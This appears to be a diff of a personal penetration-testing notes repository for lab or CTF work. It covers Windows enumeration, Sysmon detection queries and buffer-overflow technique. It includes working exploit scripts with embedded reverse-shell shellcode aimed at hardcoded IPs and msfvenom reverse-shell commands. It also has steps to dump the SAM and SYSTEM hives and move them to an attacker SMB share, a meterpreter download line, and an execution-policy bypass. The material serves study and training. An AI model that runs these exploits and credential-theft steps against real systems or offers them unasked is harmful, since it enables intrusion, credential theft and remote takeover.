Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"'
```
### Command Line Logging
* Enable PS Logging
```sh
Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
```
* CLI Process Auditing -- ID 4688
```
Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation
```

18
enumeration/windows/manual_enum.md Normal file
View File

@ -0,0 +1,18 @@
# Manual Windows Enumeration
* `whoami /priv`
* `whoami /groups`
* Looking for non-default services:
```sh
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
```
* **Unquoted Service Path** Ideally there is a path without quotation
* Check which account the service the services run as
```sh
sc qc <ServiceName>
```
* Check if directory is writeable
```sh
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
```

238
enumeration/windows/powershell.md Normal file
View File

@ -0,0 +1,238 @@
# Powershell Usage
## Get-Help
```
Get-Help Command-Name
```
* Show examples
```
Get-Help Command-Name -Examples
```
* Get-Command gets all the cmdlets installed on the current Computer.
```
Get-Command
```
```
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```
## Passing Output via Pipe
* A pipe passes object including methods and attributes.
```
Verb-Noun | Get-Member
```
```
Get-Command | Get-Member -MemberType Method
```
## Creating Objects from Previous Cmdlets
```
Get-ChildItem | Select-Object -Property Mode, Name
```
* first - gets the first x object
* last - gets the last x object
* unique - shows the unique objects
* skip - skips x objects
## Filtering Objects
```
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
* Where -operator is a list of the following operators:
* -Contains: if any item in the property value is an exact match for the specified value
* -EQ: if the property value is the same as the specified value
* -GT: if the property value is greater than the specified value
## Sort Object
```
Verb-Noun | Sort-Object
```
```
Get-ChildItem | Sort-Object
```
## Finding a File
```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
```
```sh
Get-HotFix | Format-list | findstr <searchstring>
```
## Showing File Content
```
Get-Content 'C:\Program Files\interesting-file.txt'
```
## Copy File Content
```sh
Copy-Item <sourcefile> <destfile>
```
## Count Lines of Output
As an example, count all cmdlets on the system
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```
## Checksum of File
```
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```
## Current Working Directory
```
Get-Location
```
## File Metadata
```sh
ls | Format-List *
```
## Web Request
```sh
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
```
```sh
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```
## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
```
## **Circumvent Execution-Policy**
```sh
powershell -ExecutionPolicy Bypass -File .\<file>
```
```sh
Set-ExecutionPolicy Bypass -Scope Process
```
## Enumeration
### Users
```
Get-LocalUser
```
* Password not required users
```
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```
* SID of users
```
Get-WmiObject win32_useraccount | Select name, sid
```
### Network intel
* IP Address
```
Get-NetIpAddress
```
* Listening TCP Ports
```
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```
* TCP Port by number
```
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```
### Patch level and updates
```
Get-Hotfix
```
* Find patch by HotFixID
```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
```
### Find files and Content
* Find backup files
```
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
```
* Find file contents
```
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
```
### Processes
* Start processes
```sh
Start-Process <process>
```
* Running processes
```sh
Get-Process <process>
```
* Scheduled Tasks, by TaskName
```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```
or
```
Get-ScheduledTask -TaskName taskname
```
### Export Output
* Export as CSV
```sh
Get-Process <process> | Export-Csv <output.csv>
```
### ACL
* Owner of files
```
Get-ACL C:\
```
### Port Scanner
```
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
```
### Ping Hosts
```sh
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
```
### Using Powerview
```sh
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```
* Enumerate Group Policy
```sh
Get-NetGPO
```
* Trust relationship to other domains
```sh
Get-NetDomainTrust
```
* User enumeration
```sh
Find-LocalAdminAccess
```

97
enumeration/windows/sysinternals.md Normal file
View File

@ -0,0 +1,97 @@
# Sysinternals and CLI usage
## Opening System Properties
```
sysdm.cpl
```
## Installing webdav server,
* Starting windows webclient service
```
get-service webclient
start-service webclient
```
* Opening NetworkAndSharingCenter
```
control.exe /name Microsoft.NetworkAndSharingCenter
```
## Make sure Network Discovery is enabled, advanced settings!
```
Install-WindowsFeature WebDAV-Redirector Restart
Get-WindowsFeature WebDAV-Redirector | Format-Table Autosize
```
## Sigcheck
Sigcheck is a command-line utility that shows file version number, timestamp information, and digital signature details, including certificate chains. It also includes an option to check a files status on VirusTotal, a site that performs automated file scanning against over 40 antivirus engines, and an option to upload a file for scanning.
* Check for unsigned files in `C:\Windows\system32`
```
sigcheck -u -e C:\Windows\System32
```
* `-u` "If VirusTotal check is enabled, show files that are unknown by VirusTotal or have non-zero detection, otherwise show only unsigned files."
* `-e` "Scan executable images only (regardless of their extension)"
## Alternate Data Stream (ADS)
By default, all data is stored in a file's main unnamed data stream, but by using the syntax 'file:stream', you are able to read and write to alternates. (official definition)
```
streams file.txt
notepad file.txt:<datastream_name>
or
Get-Content -Path .\file.txt -stream ads.txt
```
## SDelete
SDelete is a command line utility that takes a number of options. In any given use, it allows you to delete one or more files and/or directories, or to cleanse the free space on a logical disk.
## TCPView
TCPView provides a more informative and conveniently presented subset of the Netstat program that ships with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
```
tcpview
tcpvcon
```
## Autoruns
Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more.
## Procdump
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.
## Procdump
The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded.
## Procmon
Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity.
## Psexec
PsExec is a light-weight telnet-replacement that lets you execute processes on other systems, complete with full interactivity for console applications, without having to manually install client software. PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems
## Winobj
WinObj is a 32-bit Windows NT program that uses the native Windows NT API (provided by NTDLL.DLL) to access and display information on the NT Object Manager's name space.
## BGInfo
It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer name, IP address, service pack version, and more
## RegJump
This little command-line applet takes a registry path and makes Regedit open to that path. It accepts root keys in standard (e.g. HKEY_LOCAL_MACHINE) and abbreviated form (e.g. HKLM).
```
regjump HKLM
```
* Similar to
```
reg query HKLM
```
Get-Item
Get-ItemProperty
```
## Strings
Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.

63
enumeration/windows/sysmon.md Normal file
View File

@ -0,0 +1,63 @@
# Sysmon
Sysmon gathers detailed and high-quality logs as well as event tracing that assists in identifying anomalies in your environment. Sysmon is most commonly used in conjunction with security information and event management (SIEM) system or other log parsing solutions that aggregate, filter, and visualize events.
## Paths
* Logfiles
```
Applications and Services Logs/Microsoft/Windows/Sysmon/Operational
```
## Configuration
* [SwiftOnSecurity](https://github.com/SwiftOnSecurity/sysmon-config)
* [ION-Storm](https://github.com/ion-storm/sysmon-config/blob/develop/sysmonconfig-export.xml)
## Installation
```sh
Downloads-SysInternalsTools C:\Sysinternals
```
## Best Practices
* Exclude, not include events
* CLI gives further control over filters
```sh
Get-WinEvent
```
```sh
wevutil.exe
```
* Know the env before implementation
## Filtering Events
* Actions -> Filter Current Log
### Filtering Events with Powershell
* Logged Events containing port 4444
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=4444'
```
* Logged Events containing lsass.exe
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=10 and */EventData/Data[@Name="TargetImage"] and */EventData/Data="C:\Windows\system32\lsass.exe"'
```
* Rats and C2
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=3 and */EventData/Data[@Name="DestinationPort"] and */EventData/Data=<Port>'
```
## Evasion Techniques
* Alternate Data Streams
* Injections
* Masquerading
* Packing/Compression
* Recompiling
* Obfuscation
* Anti-Reversing Techniques
* Remote Thread (OpenThread, ResumeThread)
### Detecting Evasion Techniques with Powershell
```sh
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=15'
Get-WinEvent -Path <Path to Log> -FilterXPath '*/System/EventID=8'
```

14
exfiltration/windows/loot.md Normal file
View File

@ -0,0 +1,14 @@
# Loot Windows Credentials
```sh
reg.exe save HKLM\SAM sam.bak
```
```sh
reg.exe save HKLM\SYSTEM system.bak
```
* Exifiltrate and use impacket
```sh
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
```

29
exfiltration/windows/smb_connection.md Normal file
View File

@ -0,0 +1,29 @@
# Connect to Attacker SMB
## Attacker
* Impacket smbserver on attacker
```sh
sudo examples/smbserver.py share . -smb2support -username <user> -password <password>
```
## Target
* Connect to attacker smb
```sh
net use \\<attacker-IP>\share /User:<user> <Password>
```
* Save data to attacker's smb
```sh
move sam.bak \\<attacker-IP>\share\sam.bak
move system.bak \\<attacker-IP>\share\system.bak
```
* Disconnect
```sh
net use \\<attacker-IP>\share /del
```
## Workarounds
* System Error 1312. User credentials need a domain
```sh
/USER:domain\user
```

8
exploit/buffer_overflow/bad_chars.py Executable file
View File

@ -0,0 +1,8 @@
#!/usr/bin/env python3
from __future__ import print_function
listRem = "\\x0a".split("\\x")
for x in range(1, 256):
if "{:02x}".format(x) not in listRem:
print("\\x" + "{:02x}".format(x), end='')
print()

65
exploit/buffer_overflow/brainstorm.py Normal file
View File

@ -0,0 +1,65 @@
import sys
import socket
badchars = bytearray()
listRem = [0x00]
for x in range(1, 256):
if x not in listRem:
badchars.append(x)
buf = b""
buf += b"\xdd\xc0\xd9\x74\x24\xf4\xbe\xd0\xdb\x95\xa8\x5d\x29"
buf += b"\xc9\xb1\x52\x31\x75\x17\x83\xc5\x04\x03\xa5\xc8\x77"
buf += b"\x5d\xb9\x07\xf5\x9e\x41\xd8\x9a\x17\xa4\xe9\x9a\x4c"
buf += b"\xad\x5a\x2b\x06\xe3\x56\xc0\x4a\x17\xec\xa4\x42\x18"
buf += b"\x45\x02\xb5\x17\x56\x3f\x85\x36\xd4\x42\xda\x98\xe5"
buf += b"\x8c\x2f\xd9\x22\xf0\xc2\x8b\xfb\x7e\x70\x3b\x8f\xcb"
buf += b"\x49\xb0\xc3\xda\xc9\x25\x93\xdd\xf8\xf8\xaf\x87\xda"
buf += b"\xfb\x7c\xbc\x52\xe3\x61\xf9\x2d\x98\x52\x75\xac\x48"
buf += b"\xab\x76\x03\xb5\x03\x85\x5d\xf2\xa4\x76\x28\x0a\xd7"
buf += b"\x0b\x2b\xc9\xa5\xd7\xbe\xc9\x0e\x93\x19\x35\xae\x70"
buf += b"\xff\xbe\xbc\x3d\x8b\x98\xa0\xc0\x58\x93\xdd\x49\x5f"
buf += b"\x73\x54\x09\x44\x57\x3c\xc9\xe5\xce\x98\xbc\x1a\x10"
buf += b"\x43\x60\xbf\x5b\x6e\x75\xb2\x06\xe7\xba\xff\xb8\xf7"
buf += b"\xd4\x88\xcb\xc5\x7b\x23\x43\x66\xf3\xed\x94\x89\x2e"
buf += b"\x49\x0a\x74\xd1\xaa\x03\xb3\x85\xfa\x3b\x12\xa6\x90"
buf += b"\xbb\x9b\x73\x36\xeb\x33\x2c\xf7\x5b\xf4\x9c\x9f\xb1"
buf += b"\xfb\xc3\x80\xba\xd1\x6b\x2a\x41\xb2\x99\xa2\x4e\x83"
buf += b"\xf6\xb6\x50\x12\x5b\x3e\xb6\x7e\x73\x16\x61\x17\xea"
buf += b"\x33\xf9\x86\xf3\xe9\x84\x89\x78\x1e\x79\x47\x89\x6b"
buf += b"\x69\x30\x79\x26\xd3\x97\x86\x9c\x7b\x7b\x14\x7b\x7b"
buf += b"\xf2\x05\xd4\x2c\x53\xfb\x2d\xb8\x49\xa2\x87\xde\x93"
buf += b"\x32\xef\x5a\x48\x87\xee\x63\x1d\xb3\xd4\x73\xdb\x3c"
buf += b"\x51\x27\xb3\x6a\x0f\x91\x75\xc5\xe1\x4b\x2c\xba\xab"
buf += b"\x1b\xa9\xf0\x6b\x5d\xb6\xdc\x1d\x81\x07\x89\x5b\xbe"
buf += b"\xa8\x5d\x6c\xc7\xd4\xfd\x93\x12\x5d\x1d\x76\xb6\xa8"
buf += b"\xb6\x2f\x53\x11\xdb\xcf\x8e\x56\xe2\x53\x3a\x27\x11"
buf += b"\x4b\x4f\x22\x5d\xcb\xbc\x5e\xce\xbe\xc2\xcd\xef\xea"
ip = "10.10.143.77"
port = 9999
offset = 2012
overflow = b"A" * offset
retn = b"\xdf\x14\x50\x62" #"BBBB"
padding = b"\x90" * 16
payload = buf
postfix = b""
buffer = overflow + retn + padding + payload + postfix
try:
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
s.recv(2000)
s.send(b"pwnbot")
s.recv(2000)
print("Sending evil buffer...")
s.send(buffer)
print("Done!")
s.close()
except socket.error:
print("Could not connect: "+socket.error)

54
exploit/buffer_overflow/buffer_overflow.py Executable file
View File

@ -0,0 +1,54 @@
#!/usr/bin/env python3
import socket
ip = "10.10.122.155"
port = 31337
prefix = ""
offset = 146
overflow = "A" * offset
# EIP return
#retn = "BBBB"
retn = "\xc3\x14\x04\x08"
padding = "\x90" * 16
#padding = ""
#payload = ""
payload = "\xd9\xc8\xbb\xbb\x5e\x64\xef\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
payload += "\x52\x83\xc0\x04\x31\x58\x13\x03\xe3\x4d\x86\x1a\xef\x9a\xc4"
payload += "\xe5\x0f\x5b\xa9\x6c\xea\x6a\xe9\x0b\x7f\xdc\xd9\x58\x2d\xd1"
payload += "\x92\x0d\xc5\x62\xd6\x99\xea\xc3\x5d\xfc\xc5\xd4\xce\x3c\x44"
payload += "\x57\x0d\x11\xa6\x66\xde\x64\xa7\xaf\x03\x84\xf5\x78\x4f\x3b"
payload += "\xe9\x0d\x05\x80\x82\x5e\x8b\x80\x77\x16\xaa\xa1\x26\x2c\xf5"
payload += "\x61\xc9\xe1\x8d\x2b\xd1\xe6\xa8\xe2\x6a\xdc\x47\xf5\xba\x2c"
payload += "\xa7\x5a\x83\x80\x5a\xa2\xc4\x27\x85\xd1\x3c\x54\x38\xe2\xfb"
payload += "\x26\xe6\x67\x1f\x80\x6d\xdf\xfb\x30\xa1\x86\x88\x3f\x0e\xcc"
payload += "\xd6\x23\x91\x01\x6d\x5f\x1a\xa4\xa1\xe9\x58\x83\x65\xb1\x3b"
payload += "\xaa\x3c\x1f\xed\xd3\x5e\xc0\x52\x76\x15\xed\x87\x0b\x74\x7a"
payload += "\x6b\x26\x86\x7a\xe3\x31\xf5\x48\xac\xe9\x91\xe0\x25\x34\x66"
payload += "\x06\x1c\x80\xf8\xf9\x9f\xf1\xd1\x3d\xcb\xa1\x49\x97\x74\x2a"
payload += "\x89\x18\xa1\xfd\xd9\xb6\x1a\xbe\x89\x76\xcb\x56\xc3\x78\x34"
payload += "\x46\xec\x52\x5d\xed\x17\x35\x68\xfb\x10\x04\x04\xf9\x1e\x97"
payload += "\x88\x74\xf8\xfd\x22\xd1\x53\x6a\xda\x78\x2f\x0b\x23\x57\x4a"
payload += "\x0b\xaf\x54\xab\xc2\x58\x10\xbf\xb3\xa8\x6f\x9d\x12\xb6\x45"
payload += "\x89\xf9\x25\x02\x49\x77\x56\x9d\x1e\xd0\xa8\xd4\xca\xcc\x93"
payload += "\x4e\xe8\x0c\x45\xa8\xa8\xca\xb6\x37\x31\x9e\x83\x13\x21\x66"
payload += "\x0b\x18\x15\x36\x5a\xf6\xc3\xf0\x34\xb8\xbd\xaa\xeb\x12\x29"
payload += "\x2a\xc0\xa4\x2f\x33\x0d\x53\xcf\x82\xf8\x22\xf0\x2b\x6d\xa3"
payload += "\x89\x51\x0d\x4c\x40\xd2\x3d\x07\xc8\x73\xd6\xce\x99\xc1\xbb"
payload += "\xf0\x74\x05\xc2\x72\x7c\xf6\x31\x6a\xf5\xf3\x7e\x2c\xe6\x89"
payload += "\xef\xd9\x08\x3d\x0f\xc8";
#payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("[*] Sending buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect")

52
exploit/buffer_overflow/docs/amd64.md Normal file
View File

@ -0,0 +1,52 @@
# amd64
* `rax` return value, caller saved.
* `r10`, `r11` are caller saved.
* `rbx`, `r12`, `r13`, `r14` are callee saved
* `rbp` is also callee saved(and can be optionally used as a frame pointer)
* `rsp` is callee saved
## Function argument registers
* `rdi`,`rsi`,`rdx`,`rcx`,`r8 `,`r9 `, called saved.
* Further function args are stored inside its stack frame.
## Overwriting Variables and Padding
* Overwrite an atomic variable behind a buffer
```C
int main ( int argc, char ** argv ) {
int var = 0
char buffer[12];
gets(buffer);
[...]
}
```
* Stack layout
```
Bottom
+------------------+
| Saved regsisters |
+------------------+
| int var |
+------------------+
| char buffer [11] |
| ... |
| ... |
| ... |
| char buffer [0] |
+------------------+
| char ** argv |
+------------------+
| char argc |
+------------------+
Top
```
* Watch out! I.e., a 12 byte array is padded to system memory allocation size.
```
+-------------+----+
|12 byte array| 4b |
+-------------+----+
0 12 16 byte
```

66
exploit/buffer_overflow/docs/buffer_overflow.md Normal file
View File

@ -0,0 +1,66 @@
# Buffer Overflow
* [Cheat Sheet](https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst)
# Usage
* Fuzz & crash the binary pretty roughly via payload
```sh
python -c "print('A' * 3000)
```
## Fuzzing
* python 3
../fuzzer.py
* python 2
../fuzzer2.py
## Measure Offset
* Use as payload
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l <bufferlength>
```
* Find content of the payload at EIP and identify exact bufferlength
```sh
/opt/metasploit/tools/exploit/pattern_offset.rb -l <bufferlength> -q <EIP-content>
```
```
msf-pattern_offset -l <bufferlength> -q <EIP>
```
```
mona msfpattern -l <bufferlength>
```
* Fill offset variable in exploit `buffer_overflow.py`
../buffer_overflow.py
* Execute buffer_overflow.py, EIP should contain `BBBB`
## Find bad characters to input in the buffer
* Execute `bad_chars.py` and include it as payload. Always excluded is `\x00`.
../bad_chars.py
* Compare stack if any bad chars block exectuion of the payload following in the next steps.
```sh
!mona bytearray -b "\x00"
!mona compare -f <path_to_bytearray.bin> -a <ESP>
```
## Find Jump Point / RoP
* Jump point to `ESP` (32 bit binary) needs to be found to put it inside `EIP`
### Example: Immunity Debugger using mona on windows machine
```sh
!mona modules
```
```sh
!mona jmp -r esp -m <exploitable_bin_from_modules>
```
* The found address needs to be **LITTLE ENDIAN NOTATION INSIDE THE EIP VARIABLE** if x86/amd64
## Shellcode as Payload
* Last part is the individual shellcode, put it in the payload variable of `buffer_overflow.py`
```sh
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker-ip LPORT=<attacker-port> -f c -e x86/shikata_ga_nai -b "\x00"
```
* Prepend NOPs as padding before shellcode

121
exploit/buffer_overflow/docs/radare2.md Normal file
View File

@ -0,0 +1,121 @@
# Return Address reuse
## via Shellcode, an examples
* Find out the address of the start of the buffer and the start address of the return address
* Calculate the difference between these addresses so you know how much data to enter to overflow
* Start out by entering the shellcode in the buffer, entering random data between the shellcode and the return address, and the address of the buffer in the return address
* Plus NOPsled (sometimes xargs is needed in front of the app call)
```python
python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05'+ '\x41' * 60 + '\xef\xbe\xad\xde')" | xargs ./buffer-overflow
```
## Finding Offset
### via gdb segfault output
* 64 bit addresses use 6 out of 8 byte for addresses.
```sh
gdb ./application
run $(python -c "print('\x41' * 180)")
```
* Return address hit completely when 6 bytes are filled.
```sh
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in copy_arg ()
```
* Buffer = measured_length - (`$rbp` + 6 bytes return address)
### via metasploit
```sh
/opt/metasploit/tools/exploit/pattern_create.rb -l 180
```
* Looking for `rbp` Content in front of the return address to measure offset
```sh
(gdb) i r
[...]
rbp 0x<rbpAddress> 0x<rbpConent>
[...]
```
* Measure offset
```sh
pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
```
## Crafting Payload
* Contains Junk/NOPslice + shellcode + Junk over rbp + return address
* Inside gdb
```sh
run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
```
* Check actual stack
```sh
(gdb) x/100x $rsp-200
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
0x7fffffffe248: 0xffffe64d 0x00007fff 0x41414141 0x41414141
0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe268: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe278: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe288: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe298: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe2a8: 0x41414141 0x41414141 0x41414141 0x48583b6a
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
[...]
```
* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
## NopSled
* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
```sh
(gdb) x/100x $rsp-200
0x7fffffffe228: 0x00400450 0x00000000 0xffffe3e0 0x00007fff
0x7fffffffe238: 0x00400561 0x00000000 0xf7dce8c0 0x00007fff
0x7fffffffe248: 0xffffe64d 0x00007fff 0x90909090 0x90909090
0x7fffffffe258: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe268: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe278: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe288: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe298: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe2a8: 0x90909090 0x90909090 0x90909090 0x48583b6a
0x7fffffffe2b8: 0xb849d231 0x69622f2f 0x68732f6e 0x08e8c149
```
* Convert return address to little endian `0x7fffffffe2a8` -> `\xa8\xe2\xff\xff\xff\x7f` and put it inside the return address
```sh
run $(python -c "print('\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'+'A'*12+'\xa8\xe2\xff\xff\xff\x7f')")
```
## setuid() and setreuid()
* Shellcode needs `setuid(0)` for effective root uid or the equivalent id of the account needed.
* `/bin/sh` checks real uid not effective uid
* ./shellcodes/setuid_shell.as
### setreuid() in assembler
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
* `setreuid(1002,1002)` sets the __real__ uid inside the shell to 1002.
* `setreuid()` has `rax` number `\x71` (`113` dec). Args are stored in `rdi` and `rsi`.
* ./shellcode/setreuid_shell.as
```sh
"\x48\x31\xFF\x48\x31\xC0\x48\x31\xF6\x66\xBE\xEA\x03\x66\xBF\xEA\x03\xB0\x71\x0F\x05\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"
```
* Convert to hex output via [Defuse](https://defuse.ca/online-x86-assembler.htm)
### setreuid() in shellcode using pwntools
* Shellcraft builds a shellcode containing `setreuid()`, without any parameter given the real uid to the file owner.
```sh
* [Linux Syscall Table](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/)
shellcraft -f d amd64.linux.setreuid
```
* The uid can be set as an argument
```sh
shellcraft -f d amd64.linux.setreuid <uid>
```
* Prepend this in front of the existing shellcode like this
```sh
run $(python -c "print('\x90' * 99 + '\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'B' * 8 + '\x88\xe2\xff\xff\xff\x7f')")
```
* Where the existing shellcode is the following
```sh
\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
```
* Setreuid part is the following
```sh
\x6a\x6b\x58\x0f\x05\x48\x89\xc7\x6a\x71\x58\x48\x89\xfe\x0f\x05
```

23
exploit/buffer_overflow/docs/shellcodes/setreuid_shell.as Normal file
View File

@ -0,0 +1,23 @@
xor rdi,rdi <------ set the rdi to 0
xor rax,rax
xor rsi, rsi <------ set the rsi to 0
mov si, 1002 <------ put the value 1002 in the lower bits of the rsi
mov di, 1002 <------ put the value 1002 in the lower bits of the rdi
mov al,0x71 <------ put the setruid function in the al register
syscall <------ call the function.
xor rdx,rdx
movabs rbx,0x68732f6e69622fff
shr rbx,0x8
push rbx
mov rdi,rsp
xor rax,rax
push rax
push rdi
mov rsi,rsp
mov al,0x3b
syscall
push 0x1
pop rdi
push 0x3c
pop rax
syscall

37
exploit/buffer_overflow/docs/shellcodes/setuid_shell.as Normal file
View File

@ -0,0 +1,37 @@
etuid(0) + execve(/bin/sh) - just 4 fun.
xi4oyu [at] 80sec.com
main(){
__asm( "xorq %rdi,%rdi\n\t"
"mov $0x69,%al\n\t"
"syscall \n\t"
"xorq %rdx, %rdx \n\t"
"movq $0x68732f6e69622fff,%rbx; \n\t"
"shr $0x8, %rbx; \n\t"
"push %rbx; \n\t"
"movq %rsp,%rdi; \n\t"
"xorq %rax,%rax; \n\t"
"pushq %rax; \n\t"
"pushq %rdi; \n\t"
